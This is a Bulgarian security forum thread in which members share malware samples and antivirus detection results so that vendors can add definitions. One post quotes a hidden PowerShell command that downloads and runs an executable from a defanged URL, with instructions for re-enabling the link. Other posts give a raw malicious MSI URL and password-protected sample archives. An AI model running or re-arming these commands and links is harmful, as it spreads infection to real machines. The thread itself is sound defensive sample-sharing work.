Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.
Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.
Добави Kaldata.com в предпочитани източници в Google

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции, откриване на нови заплахи - част 18

capnemo
в Сигурност и антивирусна защита

Featured Replies

При мен въобще не съумява да стартира.

  • Цитирай
    • Отговори 8,8k
    • Прегледи 603k
    • Създадено
    • Последен отговор

    Потребители с най-много отговори

    Популярни дни

    Най-популярни публикации

    • B-boy/StyLe/
      B-boy/StyLe/

      Каква ползва от него тогава, като мълчи като риба? Само за красота и да товари системата ли?

    • tigertron
      tigertron

      При мен пък на тестовата машина с Windows XP SP3 и MS NetFreamwork 4 не иска да се стартира. Явно и вирусите спират поддръжката на XP 

    • Proshark
      Proshark

      Този е за пращане : http://dox.bg/files/dw?a=9f58b3c1f9 https://www.virustotal.com/bg/file/2ee50fd5c9f67e8814142de2009ec4234ee19dec1d4e9189ac5f45c359ed20eb/analysis/1482744276/    

    Публикувани изображения

    преди 6 часа, nikssi написа:

    Kaspersky - HEUR:Trojan.BAT.Alien.gen

    VirusTotal - File - a7dfe696c8c5b2c0fe8ac4d525e0fe13173af727204a0727a4014199c64bab11

    А това прати ли им го ?

    Още един зловреден MSI

http://85[.]11[.]161[.]198[:]6600/qffww8ph/DTYOKUEN.msi

https://www.virustotal.com/gui/file/c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728/detection
  • Цитирай
    преди 15 часа, B-boy/StyLe/ написа:

    има си виртуални пясъчници вече

    Често дават подвеждащи изводи за липса на заплахи. Бубата може да е проектирана да не стартира в сандбокссреда. При мен е различно - настройки на хипс и на автосандбокс при стената на Комодо дебнат старт за незабавно блокиране. При липсващ старт нищо не блокират. Липсват лъжливи заключения. Мога с изключен антивирус, но тези модули задължително са включени. Привиква се да се следят логовете им.

  • Цитирай
    • Грижа 1
    преди 20 минути, attj написа:

    Често дават подвеждащи изводи за липса на заплахи. Привиква се да се следят логовете им.

    Тоше на мен ли ги обясняваш тези неща или просто за себе си ги повтаряш? И аз нали баш логовете им следя. Затова са услуги както https://hybrid-analysis.com/ , https://any.run/ и подобните. Има си маркери на активността по които човек може да определи дали дадена активност е зловредна и коя не. Следващото ниво вече е reverse engineering/debugging. но там вече не ми е сила.

  • Цитирай
    • Харесване 5

    Един файлов инфектор! Заразява всички изпълними файлове в системата (макар и не толкова комплексен като Virut). Да не се стартира от начинаещи и на работни машини! Направил съм линка неработещ. Сменете XX с tt.

    `start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'hXXps://exo-api.tf/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:APPDATA\BK619203.exe; Start-Process -FilePath $env:APPDATA\BK619203.exe -WindowStyle Hidden }`

  • Цитирай
    преди 42 минути, B-boy/StyLe/ написа:
    powershell

    преди 44 минути, B-boy/StyLe/ написа:

    Един файлов инфектор! Заразява всички изпълними файлове в системата (макар и не толкова комплексен като Virut). Да не се стартира от начинаещи и на работни машини! Направил съм линка неработещ. Сменете XX с tt.

    `start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'hXXps://exo-api.tf/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:APPDATA\BK619203.exe; Start-Process -FilePath $env:APPDATA\BK619203.exe -WindowStyle Hidden }`

    Жоре,тук ме спира Bitdefender....Не можах да стигна до самия файл,за което се извинявам...Благодаря за проверката...

    Screenshot_1.png

  • Цитирай
    • Харесване 1

    То това е по-добрия вариант честно казано! Защото вируса е много коварен. MBAM също го спира в началната фаза преди да зареди payload-a.

    Снимка от самия потребител.

    my-discord-was-hacked-and-its-spamming-mrbeast-images-like-v0-6s635egr8mwg1.png

  • Цитирай
    • Харесване 3
    преди 3 минути, nikssi написа:

    Да - няма резултат.

    Дано да го добавят. Пусни им и линка от горния пост към инфектора ако искаш. Освен ако не го засича при теб де още по време на сваляне подобно на Bitdefender-a при @Лудият Учен

  • Цитирай
    • Харесване 3
    преди 2 часа, B-boy/StyLe/ написа:

    Един файлов инфектор! Заразява всички изпълними файлове в системата (макар и не толкова комплексен като Virut). Да не се стартира от начинаещи и на работни машини! Направил съм линка неработещ. Сменете XX с tt.

    image.png

  • Цитирай
    • Харесване 4
    преди 7 минути, Лудият Учен написа:

    https://www.upload.ee/files/19280794/Malware.rar.html

    6 зловредни файла...Password : infected

    Kaspersky - 5/6

    image.png

    VirusTotal - File - 70a04d019e17240e5858fadbd4441c5bff643abfc5c449c43c1392799bf22309

    Malware analysis 70a04d019e17240e5858fadbd4441c5bff643abfc5c449c43c1392799bf22309.bat Suspicious activity | ANY.RUN - Malware Sandbox Online

    Отчет — 70A04D019E17240E5858FADBD4441C5BFF643ABFC5C449C43... — Kaspersky Threat Intelligence Portal

    image.png

    image.png

    Редактирано от nikssi (преглед на промените)

  • Цитирай
    • Харесване 2

    Микрософт не арестува тези https://www.virustotal.com/gui/file/a045c35ff3c2323f4388e08b374e20d781d29bc6dcb873880cdfe12df05903df https://www.virustotal.com/gui/file/2cb9f7a6e37cf5dacccc66a1c2bc17fd26edd3505d08cd1ae3c613806c2915f0 Автосандбоксът на Комодо блокира старта и на двете. Отново 100 % съвместен резултат.

  • Цитирай
    • Харесване 1

    Микрософт не арестува само тези https://www.virustotal.com/gui/file/5fc9f03724886a2853e50e43064718b149d1e7e14270c02783777ff1b2ae9b99 https://www.virustotal.com/gui/file/a5b189eff1131e068b5e2640604dc43e1da4fcc55001dac774bf3286fa4dde8e При стартиране и двете са блокирани от автосандбокса на стената на Комодо.

  • Цитирай
    • Харесване 1
    преди 1 час, attj написа:

    https://filmizip.com/filmi/20041-operation-seawolf.html Как е с различните защити при този хубав филм ?

    Bitdefender мълчи...

    https://www.upload.ee/files/19303345/Malware.rar.html

    6 зловредни файла...Password : infected

  • Цитирай
    • Харесване 1

    Микрософт не арестува тези https://www.virustotal.com/gui/file/3d41180b98b1ccd9a6a1a1d971d84f609931c280223e9bed0952a8349b7439e5 https://www.virustotal.com/gui/file/1dc4fe76cb896c6230b366712003ae0deee2cc46432d1938723a9c557d566ed5 Липсват им умения да стартират успешно в сандбокс-хипс среда.

  • Цитирай
    • Харесване 1

    https://www.upload.ee/files/19315758/Malware.rar.html

    6 зловредни файла...Password : infected

    Bitdefender с детекция 5/6...Единият скрипт не успя да стартира...

    Screenshot_3.png

    Screenshot_1.png

    Screenshot_2.png

  • Цитирай
    • Харесване 1
    преди 13 минути, B-boy/StyLe/ написа:

    Между другото официалната страница на Daemon Tools Lite още раздава заразения инсталатор. За който иска да го тества.

    Жоре,Bitdefender мълчи...Благодаря за проверката !!!

    VirusTotal - File - da1a51b7022d8e726de981fcdb364096e90a8134dd380f9d76c4c20fea701836

    Screenshot_1.png

  • Цитирай
    • Харесване 1

    Лошо...само Касперски го засичат все още, а доста се разчу. Ето разликата между компрометирания (червена рамка) и "чистия" инсталатор" (зелена рамка и само стандартния adware):

    TVvfsYx.png

    Опа след рефреш на резултатите вече го засичат 6 програми!!!

    https://www.virustotal.com/gui/file/da1a51b7022d8e726de981fcdb364096e90a8134dd380f9d76c4c20fea701836?nocache=1

  • Цитирай
    • Харесване 1
    преди 3 минути, B-boy/StyLe/ написа:

    Лошо...само Касперски го засичат все още, а доста се разчу. Ето разликата между компрометирания (червена рамка) и "чистия" инсталатор" (зелена рамка и само стандартния adware):

    TVvfsYx.png

    Жоре,вече са 6 антивирусните програми, които го засичат...А беше само Касперски преди 3 минути...

  • Цитирай
    • Харесване 1

    Добавете отговор

    Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.

    Гост
    Публикацията ви съдържа термини, които не допускаме! Моля, редактирайте съдържанието си и премахнете подчертаните думи по-долу. Ако замените букви от думата със звездички или друго, за да заобиколите това предупреждение, профилът ви ще бъде блокиран и наказан!
    Напишете отговор в тази тема...
    Назад

    Разглеждащи това в момента 0

    • Няма регистрирани потребители разглеждащи тази страница.

    Дарение

    • Подкрепи съществуването на форума - направи дарение
      25%
      Дарени 252.69 EUR от нужните 1,000.00 EUR

    Бюлетин

    Получавайте известие, когато има важна промяна или новина свързана с форума.
    Абонирайте се

    Профил

    Навигация

    Търсене

    Търсене

    Конфигуриране на push известия в браузъра
    Chrome (Android)
    1. Докоснете иконата на катинар до адресната лента.
    2. Докоснете Разрешения → Известия.
    3. Променете предпочитанията си.
    Chrome (Desktop)
    1. Кликнете върху иконата на катинар в адресната лента.
    2. Изберете Настройки на сайта.
    3. Намерете Известия и коригирайте предпочитанията си.